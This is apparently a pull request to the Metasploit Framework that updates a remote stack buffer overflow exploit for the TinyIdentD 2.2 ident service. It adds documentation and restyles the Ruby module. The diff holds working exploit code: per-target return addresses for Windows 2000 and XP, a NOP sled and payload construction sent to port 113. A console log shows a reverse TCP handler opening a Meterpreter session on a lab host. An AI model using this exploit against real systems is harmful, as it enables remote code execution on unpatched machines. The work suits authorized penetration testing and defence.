### PR TITLE
Update TinyIdentD 2.2 Stack Buffer Overflow module

### DIFF
--- a/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md
+++ b/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+  This module exploits a stack based buffer overflow in TinyIdentD
+  version 2.2.
+
+  If we send a long string to the ident service we can overwrite the
+  return address and execute arbitrary code. Credit to Maarten Boone.
+
+  Download:
+
+  * https://download.cnet.com/Tiny-IdentD/3000-2150_4-10147419.html
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/misc/tiny_identd_overflow`
+  3. `set RHOSTS <rhost>`
+  4. `set TARGET <target>`
+  5. `run`
+  6. You should get a new session
+
+
+## Options
+
+
+## Scenarios
+
+### TinyIdentD 2.2 on Windows XP SP0 - English (x86)
+
+  ```
+  msf5 > use exploit/windows/misc/tiny_identd_overflow
+  msf5 exploit(windows/misc/tiny_identd_overflow) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   Automatic
+     1   Windows 2000 Server SP4 - English
+     2   Windows 2000 Pro All - English
+     3   Windows 2000 Pro All - Italian
+     4   Windows 2000 Pro All - French
+     5   Windows XP SP0/1 - English
+     6   Windows XP SP2 - English
+     7   Windows XP SP2 - Italian
+
+
+  msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
+  target => 5
+  msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
+  rhosts => 172.16.191.140
+  msf5 exploit(windows/misc/tiny_identd_overflow) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
+  [*] Sending stage (176195 bytes) to 172.16.191.140
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400
+
+  meterpreter > sysinfo 
+  Computer        : WINXP
+  OS              : Windows XP (5.1 Build 2600).
+  Architecture    : x86
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter > 
+  ```

--- a/modules/exploits/windows/misc/tiny_identd_overflow.rb
+++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb
@@ -9,35 +9,53 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'TinyIdentD 2.2 Stack Buffer Overflow',
-      'Description'    => %q{
-          This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
-        If we send a long string to the ident service we can overwrite the return
-        address and execute arbitrary code. Credit to Maarten Boone.
-      },
-      'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
-      'References'     =>
-        [
-          ['CVE', '2007-2711'],
-          ['OSVDB', '36053'],
-          ['BID', '23981'],
-        ],
-      'Payload'        =>
-        {
-          'Space'    => 400,
-          'BadChars' => "\x00\x0d\x20\x0a"
+    super(
+      update_info(
+        info,
+        'Name' => 'TinyIdentD 2.2 Stack Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack based buffer overflow in TinyIdentD
+          version 2.2.
+          If we send a long string to the ident service we can overwrite the
+          return address and execute arbitrary code. Credit to Maarten Boone.
         },
-      'Platform'       => 'win',
-      'Targets'        =>
+        'Author' =>
         [
-          ['Windows 2000 Server SP4 English',   { 'Ret' => 0x7c2d15e7, } ], # call esi
-          ['Windows XP SP2 Italian',            { 'Ret' => 0x77f46eda, } ], # call esi
-
+          'Maarten Boone', # discovery
+          'Jacopo Cervini <acaro[at]jervus.it>', # metasploit
         ],
-      'Privileged'     => false,
-      'DisclosureDate' => 'May 14 2007'
-      ))
+        'References' =>
+          [
+            ['BID', '23981'],
+            ['CVE', '2007-2711'],
+            ['EDB', '3925'],
+            ['OSVDB', '36053'],
+          ],
+        'Payload' =>
+          {
+            'Space' => 450,
+            'BadChars' => "\x00\x0d\x20\x0a"
+          },
+        'Platform' => 'win',
+        'Targets' =>
+          [
+            ['Windows 2000 Server SP4 - English', { 'Ret' => 0x7c2d15e7 } ], # call esi
+            ['Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
+            ['Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
+            ['Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
+            ['Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
+            ['Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
+            ['Windows XP SP2 - Italian', { 'Ret' => 0x77f46eda } ], # call esi
+          ],
+        'Notes' =>
+          {
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SERVICE_DOWN ]
+          },
+        'Privileged' => false,
+        'DisclosureDate' => 'May 14 2007'
+      )
+    )
 
     register_options([ Opt::RPORT(113) ])
   end
@@ -45,18 +63,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    pattern  = "\xeb\x20"+", 28 : USERID : UNIX :";
-    pattern << make_nops(0x1eb - payload.encoded.length)
-    pattern << payload.encoded
-    pattern << [ target.ret ].pack('V')
+    print_status("Trying #{target.name} using address at #{'0x%.8x' % target.ret} ...")
 
-
-    request  = pattern + "\n"
-
-    print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")
+    request = "\xeb\x20, 28 : USERID : UNIX :"
+    request << make_nops(491 - payload.encoded.length)
+    request << payload.encoded
+    request << [ target.ret ].pack('V')
+    request << "\n"
 
     sock.put(request)
-
 
     handler
     disconnect


### PR DESCRIPTION
Update TinyIdentD 2.2 Stack Buffer Overflow module.

* Add documentation
* Update style to be compliant with Rubocop
* Add `Maarten Boone` to `authors` for discovery
* Add `Reliability` and `Stability` notes
* Increase `space` from `400` to `450` (still leaving 40+ bytes for  `491 - payload.length` for nops).
* Add additional `targets`

The existing targets used `call esi`. I copied the additional target `ret` addresses from [exploits/windows/proxy/ccproxy_telnet_ping](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb) which also used `call esi`. None of these addresses contain bad characters. I also verified that the `0x71aa1a97` address is in fact `call esi` and tested on Windows XP SP0 (English) (x86).

```
msf5 > use exploit/windows/misc/tiny_identd_overflow
msf5 exploit(windows/misc/tiny_identd_overflow) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows 2000 Server SP4 - English
   2   Windows 2000 Pro All - English
   3   Windows 2000 Pro All - Italian
   4   Windows 2000 Pro All - French
   5   Windows XP SP0/1 - English
   6   Windows XP SP2 - English
   7   Windows XP SP2 - Italian


msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
target => 5
msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
rhosts => 172.16.191.140
msf5 exploit(windows/misc/tiny_identd_overflow) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
[*] Sending stage (176195 bytes) to 172.16.191.140
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400

meterpreter > sysinfo 
Computer        : WINXP
OS              : Windows XP (5.1 Build 2600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

```
